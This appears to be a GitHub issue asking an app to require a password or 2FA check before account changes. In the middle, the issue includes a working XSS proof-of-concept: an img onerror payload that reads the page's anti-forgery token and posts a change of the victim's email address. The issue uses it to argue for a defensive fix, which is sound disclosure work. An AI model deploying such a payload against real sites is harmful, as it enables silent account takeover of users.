[Security] Require password or 2FA verification for account changes

[ashleybroughton]

trafficstars

If the site is vulnerable to XSS an attacker could change profile information for a user without their interaction. An attacker could leave a comment on the home page that changes the users e-mail address, requests a password reset, and then changes the users e-mail address back to what it was. All without them knowing.

<img src='nonexist.jpg' onerror="function readBody(e){var t;t=e.responseType&&'text'!==e.responseType?'document'===e.responseType?e.responseXML:e.response:e.responseText;var n=(new DOMParser).parseFromString(t,'text/html');return token=n.getElementsByName('__RequestVerificationToken')[0].value,csrf(token),t}var xhr=new XMLHttpRequest;function csrf(e){var t=new XMLHttpRequest;t.open('POST','https://localhost:44333/identity/account/manage'),t.setRequestHeader('Content-Type','application/x-www-form-urlencoded'),t.send('Input.Email=malicious_email%40testmail.com&Input.PhoneNumber=&__RequestVerificationToken='+e)}xhr.onreadystatechange=function(){4==xhr.readyState&&(response=readBody(xhr))},xhr.open('GET','https://localhost:44333/identity/account/manage',!0),xhr.send(null);" />

Before:

After:

[ashleybroughton]

Relates to #144 but should also be considered as a minimum requirement for account changes as further prevention.